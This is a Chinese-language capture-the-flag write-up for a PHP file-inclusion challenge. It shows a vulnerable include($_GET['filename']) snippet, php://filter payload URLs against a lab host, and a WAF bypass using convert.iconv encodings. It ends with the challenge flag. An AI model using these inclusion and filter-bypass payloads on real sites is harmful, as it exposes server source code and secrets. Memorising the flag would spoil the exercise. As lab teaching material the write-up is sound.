[攻防世界][江苏工匠杯]file_include
打开靶机url,上来就是代码审计
<?php
highlight_file(__FILE__);
include("./check.php");
if(isset($_GET['filename'])){
$filename = $_GET['filename'];
include($filename);
}
?>
这里有个include filename,题干幼教文件包含,直接运用文件包含的payload试一下,比如:php://filter
套路
构造url,执行
http://61.147.171.105:53224/?filename=php://filter/convert.base64-encode/resource=flag.php
返回
<?php
highlight_file(__FILE__);
include("./check.php");
if(isset($_GET['filename'])){
$filename = $_GET['filename'];
include($filename);
}
?>
do not hack!
既然打出了do not hack
,说明存在waf检查,那我们要做的就是如何绕过检查,先试一下究竟是在检查什么
构造url,执行
1.
http://61.147.171.105:53224/?filename=php://filter/convert.ba1se64-encode/resource=flag.php
2.
http://61.147.171.105:53224/?filename=php://filter/convert.base64-en1code/resource=flag.php
3.
http://61.147.171.105:53224/?filename=php://filter/convert.ba1se64-en1code/resource=flag.php
尝试后,发现 base64 和encode 被过滤
尝试convert.ba1se64-encode 替换,使用convert.iconv.* 绕过
使用方法
convert.iconv.<input-encoding>.<output-encoding>
or
convert.iconv.<input-encoding>/<output-encoding>
<input-encoding>和<output-encoding> 就是编码方式,有如下几种;
UCS-4*
UCS-4BE
UCS-4LE*
UCS-2
UCS-2BE
UCS-2LE
UTF-32*
UTF-32BE*
UTF-32LE*
UTF-16*
UTF-16BE*
UTF-16LE*
UTF-7
UTF7-IMAP
UTF-8*
ASCII*
这里需要多试一下,最后尝试
http://61.147.171.105:53224/?filename=php://filter/convert.iconv.UTF-8*.UTF-16*/resource=index.php
返回
<?php
highlight_file(__FILE__);
include("./check.php");
if(isset($_GET['filename'])){
$filename = $_GET['filename'];
include($filename);
}
?>
��<�?php highlight_file(__FILE__); include("./check.php"); if(isset($_GET['filename'])){ $filename = $_GET['filename']; include($filename); } ?>
说明这个套路可以
尝试一下flag.php
http://61.147.171.105:53224/?filename=php://filter/convert.iconv.UTF-8*.UTF-16*/resource=flag.php
boom, 得到cyberpeace{054e8c47d7f3684c3022bc1f8313a963}